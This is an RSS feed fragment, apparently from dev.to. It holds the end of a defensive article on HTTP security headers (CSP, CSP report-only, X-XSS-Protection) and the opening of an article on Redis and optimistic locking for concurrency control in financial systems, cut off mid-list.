&lt;ul&gt;
&lt;li&gt;Restricts which domains can load scripts, styles, images, and other resources
&lt;/li&gt;
&lt;li&gt;Prevents inline script execution (unless explicitly allowed)
&lt;/li&gt;
&lt;li&gt;Blocks unauthorized resource loading
&lt;/li&gt;
&lt;li&gt;Provides violation reporting for monitoring&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Detailed Information&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' &amp;lt;https://trusted-cdn.com&amp;gt;; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self' &amp;lt;https://fonts.gstatic.com&amp;gt;; connect-src 'self' &amp;lt;https://api.example.com&amp;gt;; frame-ancestors 'none'; base-uri 'self'; form-action 'self';
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Directives:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;default-src&lt;/code&gt;: Fallback for other resource types
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;script-src&lt;/code&gt;: Controls JavaScript execution
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;style-src&lt;/code&gt;: Controls CSS loading
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;img-src&lt;/code&gt;: Controls image loading
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;font-src&lt;/code&gt;: Controls font loading
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;connect-src&lt;/code&gt;: Controls AJAX, WebSocket, and EventSource connections
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;frame-ancestors&lt;/code&gt;: Prevents framing (replaces X-Frame-Options)
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;base-uri&lt;/code&gt;: Restricts base tag URLs
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;form-action&lt;/code&gt;: Restricts form submission URLs&lt;/li&gt;
&lt;/ul&gt;
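&lt;p&gt;Keeping the directives in a data structure and serializing them makes long policies like the one above easier to maintain; a minimal sketch (names are illustrative):&lt;/p&gt;

```python
def build_csp(directives: dict) -> str:
    """Serialize {directive: [sources]} into a Content-Security-Policy value.

    Keyword sources such as 'self' and 'none' must already include their
    single quotes, exactly as they appear in the header.
    """
    return "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )

policy = build_csp({
    "default-src": ["'self'"],
    "script-src": ["'self'", "https://trusted-cdn.com"],
    "frame-ancestors": ["'none'"],
})
```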

&lt;h3&gt;
  
  
  &lt;strong&gt;Common Issues&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Overly restrictive policies&lt;/strong&gt; can break legitimate functionality
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;'unsafe-inline'&lt;/code&gt;&lt;/strong&gt; reduces security benefits
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Third-party integrations&lt;/strong&gt; may require extensive allowlisting
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Legacy code&lt;/strong&gt; with inline scripts/styles needs refactoring&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;7. CSP Report Only&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;Content-Security-Policy-Report-Only&lt;/code&gt; (CSPRO) header is a &lt;strong&gt;“testing mode” version&lt;/strong&gt; of the &lt;code&gt;Content-Security-Policy&lt;/code&gt; (CSP) header.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;Content-Security-Policy&lt;/code&gt; (CSP):&lt;/strong&gt; Enforces restrictions (e.g., blocks inline scripts, prevents loading resources from unauthorized domains).
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;Content-Security-Policy-Report-Only&lt;/code&gt; (CSPRO):&lt;/strong&gt; Does &lt;strong&gt;not enforce&lt;/strong&gt; restrictions but &lt;strong&gt;reports violations&lt;/strong&gt; to a specified endpoint.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How It Works&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When the browser encounters something that violates the CSP rules defined in the &lt;code&gt;Content-Security-Policy-Report-Only&lt;/code&gt; header:

&lt;ul&gt;
&lt;li&gt;The resource is still loaded/executed normally.
&lt;/li&gt;
&lt;li&gt;The browser sends a &lt;strong&gt;violation report&lt;/strong&gt; (in JSON format) to the URL specified in the &lt;code&gt;report-to&lt;/code&gt; or &lt;code&gt;report-uri&lt;/code&gt; directive.
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Unlike &lt;code&gt;Content-Security-Policy&lt;/code&gt;, it does not block or alter resource loading.&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://cdn.example.com; report-uri /csp-violation-report-endpoint/
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Scripts are allowed only from self and &lt;code&gt;cdn.example.com&lt;/code&gt;.
If a script is loaded from another domain:

&lt;ul&gt;
&lt;li&gt;It will still run.
&lt;/li&gt;
&lt;li&gt;A violation report will be sent to &lt;code&gt;/csp-violation-report-endpoint/&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Violation Report Format&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Modern browsers send reports in JSON. A typical report looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"csp-report"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"document-uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://example.com/index.html"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"referrer"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://google.com/"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"violated-directive"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"script-src 'self' https://cdn.example.com"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"effective-directive"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"script-src"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"original-policy"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"default-src 'self'; script-src 'self' https://cdn.example.com; report-uri /csp-violation-report-endpoint/"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"blocked-uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://evil.com/malware.js"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"line-number"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"column-number"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;17&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"source-file"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://example.com/app.js"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"status-code"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
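&lt;p&gt;On the receiving end, a report endpoint mostly just decodes this JSON and logs the interesting fields; a minimal sketch (HTTP framing omitted; the function name is illustrative):&lt;/p&gt;

```python
import json

def summarize_csp_report(body: bytes) -> str:
    """Condense a csp-report payload into a one-line log message."""
    report = json.loads(body)["csp-report"]
    return (f"CSP violation on {report['document-uri']}: "
            f"{report['effective-directive']} blocked {report['blocked-uri']}")

# A trimmed-down payload in the same shape as the example report above
sample = json.dumps({"csp-report": {
    "document-uri": "https://example.com/index.html",
    "effective-directive": "script-src",
    "blocked-uri": "https://evil.com/malware.js",
}}).encode()
```

In production you would aggregate and deduplicate these reports rather than log each one, since a single broken page can generate thousands.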



&lt;h3&gt;
  
  
  &lt;strong&gt;8. X-XSS-Protection&lt;/strong&gt;
&lt;/h3&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Security Risk Scenario&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reflected XSS&lt;/strong&gt;: Malicious scripts in URL parameters
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stored XSS&lt;/strong&gt;: Malicious scripts stored in databases
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DOM-based XSS&lt;/strong&gt;: Client-side script injection&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How It Solves It&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Enables browser’s built-in XSS filtering:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;0&lt;/code&gt;: Disables XSS filtering
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;1&lt;/code&gt;: Enables XSS filtering
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;1; mode=block&lt;/code&gt;: Enables filtering and blocks page loading if XSS detected
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;1; report=&amp;lt;reporting-uri&amp;gt;&lt;/code&gt;: Enables filtering and reports violations to the given URI&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Detailed Information&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=/xss-report-endpoint
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;strong&gt;Common Issues&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deprecated&lt;/strong&gt; in modern browsers (replaced by CSP)
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;False positives&lt;/strong&gt; can break legitimate functionality
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Limited effectiveness&lt;/strong&gt; against sophisticated XSS attacks
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CSP is preferred&lt;/strong&gt; for comprehensive protection&lt;/li&gt;
&lt;/ul&gt;
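&lt;p&gt;Given the deprecation, a common recommendation is to explicitly disable the legacy filter and rely on CSP instead; the header values below are an illustrative sketch, not a drop-in policy:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;X-XSS-Protection: 0
Content-Security-Policy: default-src 'self'; script-src 'self'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;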

&lt;h2&gt;
  
  
  &lt;strong&gt;V. Some Common Pitfalls&lt;/strong&gt;
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Overly restrictive CSP breaking functionality&lt;/li&gt;
&lt;li&gt;Missing HTTPS for HSTS&lt;/li&gt;
&lt;li&gt;Incorrect header syntax causing browser errors&lt;/li&gt;
&lt;li&gt;Not testing across different browsers&lt;/li&gt;
&lt;li&gt;Ignoring CSP violations in production&lt;/li&gt;
&lt;li&gt;Hardcoded policies instead of environment-specific ones&lt;/li&gt;
&lt;li&gt;Missing subdomain considerations for HSTS&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;VI. Best Practices&lt;/strong&gt;
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Start with basic headers and gradually add more restrictive ones
&lt;/li&gt;
&lt;li&gt;Test thoroughly after each change
&lt;/li&gt;
&lt;li&gt;Monitor CSP violations using reporting endpoints
&lt;/li&gt;
&lt;li&gt;Keep policies updated as your application evolves
&lt;/li&gt;
&lt;li&gt;Use report-only mode (&lt;code&gt;Content-Security-Policy-Report-Only&lt;/code&gt;) initially for CSP
&lt;/li&gt;
&lt;li&gt;Document your policies for team reference
&lt;/li&gt;
&lt;li&gt;Conduct regular security audits to ensure effectiveness&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>webdev</category>
      <category>security</category>
    </item>
    <item>
      <title>How We Handle Concurrency Control in Financial Systems</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Sat, 25 Oct 2025 08:42:02 +0000</pubDate>
      <link>https://dev.to/harry_do/how-we-handle-concurrency-control-in-financial-systems-3cd9</link>
      <guid>https://dev.to/harry_do/how-we-handle-concurrency-control-in-financial-systems-3cd9</guid>
      <description>&lt;h2&gt;
  
  
  The Problem: When Data Integrity Breaks Down
&lt;/h2&gt;

&lt;p&gt;It's the end of a busy financial period. Two team members are working on the same critical financial record—one is finalizing it, the other just discovered an error and is making corrections.&lt;/p&gt;

&lt;p&gt;Both click "Save" at nearly the same time. The system accepts both changes.&lt;/p&gt;

&lt;p&gt;Later, during a review, someone notices the data doesn't look right. It's neither what the first person entered nor what the second person corrected—it's a corrupted mix of both. Worse, the audit trail is incomplete. No one can tell what happened or when.&lt;/p&gt;

&lt;p&gt;This is the nightmare scenario that keeps financial system architects awake at night.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Financial Systems Are Different
&lt;/h2&gt;

&lt;p&gt;In a social media app, if two users accidentally overwrite each other's comments, it's annoying. In a financial system, &lt;strong&gt;data integrity isn't just important—it's legally mandated&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When you're dealing with money, regulatory compliance, and financial reporting that could affect shareholder decisions or SEC filings, you can't have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lost Updates&lt;/strong&gt;: One person's approved transaction being silently overwritten by another's edit&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inconsistent State&lt;/strong&gt;: A transaction being approved for financial reporting while someone else is still modifying it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit Trail Gaps&lt;/strong&gt;: Missing records of who changed what and when—a regulatory compliance nightmare&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance Violations&lt;/strong&gt;: Inaccurate financial reports that could trigger investigations, fines, or worse&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cascading Errors&lt;/strong&gt;: Wrong figures feeding into quarterly reports, tax calculations, and investor statements&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In financial systems, &lt;strong&gt;every cent must be accounted for, every change must be tracked, and data integrity is non-negotiable&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Our Mission: Protecting Financial Data Integrity
&lt;/h2&gt;

&lt;p&gt;After witnessing the chaos that uncontrolled concurrent access can cause, we set out to build a system with one core principle: &lt;strong&gt;First come, first served—and everyone else gets told exactly what's happening.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our philosophy is simple:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Priority to Speed&lt;/strong&gt;: The first user to start an operation gets to complete it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No Silent Overwrites&lt;/strong&gt;: If a second user tries to update based on outdated data, we reject the operation with a clear error message—forcing them to refresh, review the latest changes, and then make their update based on current data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clarity for Others&lt;/strong&gt;: Anyone who tries to modify the same data gets a clear, actionable error message&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Tolerance for Data Loss&lt;/strong&gt;: We'd rather block an operation than risk corrupting financial records&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Three War Stories: When Concurrency Goes Wrong
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Story #1: The Race Condition
&lt;/h3&gt;

&lt;p&gt;Two team members receive an alert about an error in a financial record. They both open it simultaneously and start making corrections.&lt;/p&gt;

&lt;p&gt;User A saves their changes. A few seconds later, User B saves.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What should happen?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;User A's save goes through. User B gets a clear message: &lt;em&gt;"This record was modified by another user while you were editing. Please refresh and try again."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;User B refreshes, sees the fix is already done, and continues their work.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What could go wrong without protection?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Without concurrency control, both saves might succeed. The final data could be a mix of both changes, or worse—one person's entire update could be silently overwritten, causing data loss in financial records.&lt;/p&gt;

&lt;h3&gt;
  
  
  Story #2: The Moving Target
&lt;/h3&gt;

&lt;p&gt;A supervisor is reviewing a financial record for approval. The data looks good, so they click "Approve."&lt;/p&gt;

&lt;p&gt;But there's a problem: while the supervisor had the approval screen open, another user discovered an error and was actively updating that same record.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What should happen?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The system blocks the approval attempt with a message: &lt;em&gt;"This record is currently being modified by another user. Please wait and try again."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters in financial systems:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The supervisor was about to approve data that was actively being changed. In financial systems, approving a record locks it for regulatory reporting. If they approved incomplete or incorrect data, it could cascade into financial statements, tax calculations, and compliance reports—creating serious regulatory risks.&lt;/p&gt;

&lt;h3&gt;
  
  
  Story #3: The Time Traveler's Mistake
&lt;/h3&gt;

&lt;p&gt;An approver opens a financial record to review it. They get interrupted by a meeting, leaving their browser tab open for 30 minutes.&lt;/p&gt;

&lt;p&gt;While they're away, another user discovers an error and updates the record with corrected values.&lt;/p&gt;

&lt;p&gt;The approver returns and, without refreshing, clicks "Approve"—still looking at the old data on their screen.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What should happen?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The system detects they're trying to approve an outdated version. They get a message: &lt;em&gt;"This record has been modified since you opened it. Please refresh to see the latest version before approving."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The financial compliance angle:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The approver made a decision based on stale data. In financial systems, approvers must see current, accurate data before making decisions. Approving outdated data isn't just a technical bug—it's a control failure that auditors flag during compliance reviews.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Solution: Two Locks for Two Problems
&lt;/h2&gt;

&lt;p&gt;Looking at our three stories, we noticed something interesting: they represent two fundamentally different concurrency problems.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stories #1 and #2&lt;/strong&gt; are about &lt;strong&gt;concurrent operations&lt;/strong&gt;—multiple people trying to modify or approve the same record at the same time. We need to prevent them from stepping on each other's toes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Story #3&lt;/strong&gt; is about &lt;strong&gt;version conflicts&lt;/strong&gt;—someone making decisions based on outdated data. We need to detect when data has changed since they last looked at it.&lt;/p&gt;

&lt;p&gt;Different problems require different solutions:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Problem Type&lt;/th&gt;
&lt;th&gt;Solution&lt;/th&gt;
&lt;th&gt;Which Stories&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Concurrent Operations&lt;/td&gt;
&lt;td&gt;Pessimistic Locking (Redis)&lt;/td&gt;
&lt;td&gt;#1, #2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version Conflicts&lt;/td&gt;
&lt;td&gt;Optimistic Locking&lt;/td&gt;
&lt;td&gt;#3&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Solution #1: Pessimistic Locking (For Concurrent Operations)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Challenge
&lt;/h3&gt;

&lt;p&gt;When two users both try to edit Transaction #A2547, or when a supervisor tries to approve it while someone else is editing, we need to physically prevent them from accessing the same record at the same time. One person gets the lock, everyone else waits.&lt;/p&gt;

&lt;p&gt;Think of it like a bathroom door lock—only one person at a time, and everyone else can see it's occupied.&lt;/p&gt;

&lt;h3&gt;
  
  
  Two Ways to Lock: Database vs Redis
&lt;/h3&gt;

&lt;p&gt;We considered two approaches:&lt;/p&gt;

&lt;h4&gt;
  
  
  Option 1: Redis Distributed Locks
&lt;/h4&gt;

&lt;p&gt;Before any user touches a record, we check Redis: "Is anyone else working on this record?" If yes, they wait. If no, we create a lock entry in Redis indicating someone is editing it.&lt;/p&gt;

&lt;p&gt;Advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Works across multiple servers&lt;/li&gt;
&lt;li&gt;Supports batch approval jobs that run for 15+ minutes&lt;/li&gt;
&lt;li&gt;Locks automatically expire if something crashes&lt;/li&gt;
&lt;li&gt;Doesn't tie up database connections&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Downsides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;We need to run Redis (one more thing to maintain)&lt;/li&gt;
&lt;li&gt;We have to handle lock logic carefully in code&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Option 2: Database Row Locks (SELECT FOR UPDATE)
&lt;/h4&gt;

&lt;p&gt;Use the database's built-in locking with &lt;code&gt;SELECT FOR UPDATE&lt;/code&gt;. When a user queries a record for editing, the database locks that row until they're done.&lt;/p&gt;

&lt;p&gt;Advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No extra infrastructure needed&lt;/li&gt;
&lt;li&gt;Automatic cleanup when transaction commits&lt;/li&gt;
&lt;li&gt;Database handles deadlocks automatically&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Downsides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Keeps database connections busy during long operations&lt;/li&gt;
&lt;li&gt;Doesn't work for async batch jobs (can't hold a lock across job queues)&lt;/li&gt;
&lt;li&gt;Under heavy load, we could run out of database connections&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why We Chose Redis
&lt;/h3&gt;

&lt;p&gt;We went with Redis for one critical reason: &lt;strong&gt;batch operations&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Financial systems often need to process hundreds or thousands of records at once (like batch approvals). These operations run as background jobs that might take 15-30 minutes. Database locks can't survive across job queue boundaries—the HTTP request ends, the database transaction commits, and the lock is gone before the background job even starts.&lt;/p&gt;

&lt;p&gt;With Redis, we can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Acquire the lock when the user initiates a batch operation&lt;/li&gt;
&lt;li&gt;Store the lock token in the database&lt;/li&gt;
&lt;li&gt;Pass it to the background job via message queue&lt;/li&gt;
&lt;li&gt;Have the job release the lock when done&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Plus, for financial systems, we'd rather sacrifice a bit of infrastructure complexity than risk exhausting our database connection pool during critical processing periods.&lt;/p&gt;




&lt;h2&gt;
  
  
  Solution #2: Optimistic Locking (For Version Conflicts)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem with Stale Data
&lt;/h3&gt;

&lt;p&gt;Remember Story #3? An approver opened a record, got interrupted, and came back 30 minutes later to approve it—not knowing another user had updated it in the meantime.&lt;/p&gt;

&lt;p&gt;We can't lock the record for 30 minutes while someone is away. That would block everyone else from working on it. Instead, we use "optimistic locking"—we &lt;em&gt;assume&lt;/em&gt; conflicts are rare, but we &lt;em&gt;verify&lt;/em&gt; the data hasn't changed before committing.&lt;/p&gt;

&lt;h3&gt;
  
  
  How We Detect Version Changes
&lt;/h3&gt;

&lt;p&gt;We track versions two different ways, depending on how the database table works:&lt;/p&gt;

&lt;h4&gt;
  
  
  Strategy 1: ID-Based Versioning (For Audit Tables)
&lt;/h4&gt;

&lt;p&gt;Some financial tables never delete or overwrite data—for audit compliance. Every edit creates a new record with a new ID, and we mark the old one as deleted.&lt;/p&gt;

&lt;p&gt;When someone tries to approve:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Their browser sends: "I want to approve record ID abc123"&lt;/li&gt;
&lt;li&gt;Backend checks: "What's the current active record?"&lt;/li&gt;
&lt;li&gt;If the current record has a different ID (someone created a new version), we reject the approval&lt;/li&gt;
&lt;li&gt;They get told: "This has been modified. Please review the latest version."&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Strategy 2: Timestamp-Based Versioning (For Regular Tables)
&lt;/h4&gt;

&lt;p&gt;For tables that update in place, we use the &lt;code&gt;updated_at&lt;/code&gt; timestamp as a version number.&lt;/p&gt;

&lt;p&gt;When someone tries to approve:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Their browser sends: "I want to approve, and I'm looking at the version from [timestamp]"&lt;/li&gt;
&lt;li&gt;Backend checks the current &lt;code&gt;updated_at&lt;/code&gt; timestamp&lt;/li&gt;
&lt;li&gt;If timestamps don't match → reject the approval&lt;/li&gt;
&lt;li&gt;They refresh and see the latest data&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  How Both Locks Work Together
&lt;/h2&gt;

&lt;p&gt;The two mechanisms form a complete defense system. Every operation goes through both checks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌────────���────────────────────────────────────────────────────┐
│                      User Request                            │
│                 (Edit/Approve Record)                        │
└────────────────────────┬────────────────────────────────────┘
                         │
                         ▼
              ┌──────────────────────┐
              │  Pessimistic Lock    │
              │  (Redis Lock Check)  │
              └──────────┬───────────┘
                         │
                    Lock Acquired?
                    │         │
                   Yes        No
                    │         │
                    │         └──► Return Error:
                    │              "Record is being modified"
                    │
                    ▼
              ┌──────────────────────┐
              │  Optimistic Lock     │
              │  (Version Check)     │
              └──────────┬───────────┘
                         │
                   Version Match?
                    │         │
                   Yes        No
                    │         │
                    │         └──► Release Lock
                    │              Return Error:
                    │              "Version conflict detected"
                    │
                    ▼
              ┌──────────────────────┐
              │  Perform Operation   │
              │  (Update/Approve)    │
              └──────────┬───────────┘
                         │
                         ▼
              ┌──────────────────────┐
              │   Release Lock       │
              └──────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 1: Pessimistic Lock&lt;/strong&gt; catches concurrent operations happening right now.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Optimistic Lock&lt;/strong&gt; catches changes that happened earlier while the user was away.&lt;/p&gt;

&lt;p&gt;Together, they ensure financial data integrity from every angle.&lt;/p&gt;




&lt;h2&gt;
  
  
  Implementation Details: How We Built It
&lt;/h2&gt;

&lt;p&gt;This section walks through the actual implementation of our Redis-based locking system.&lt;/p&gt;

&lt;h3&gt;
  
  
  Choosing the Right Redis Library
&lt;/h3&gt;

&lt;p&gt;We had two options for Redis locking in Go:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
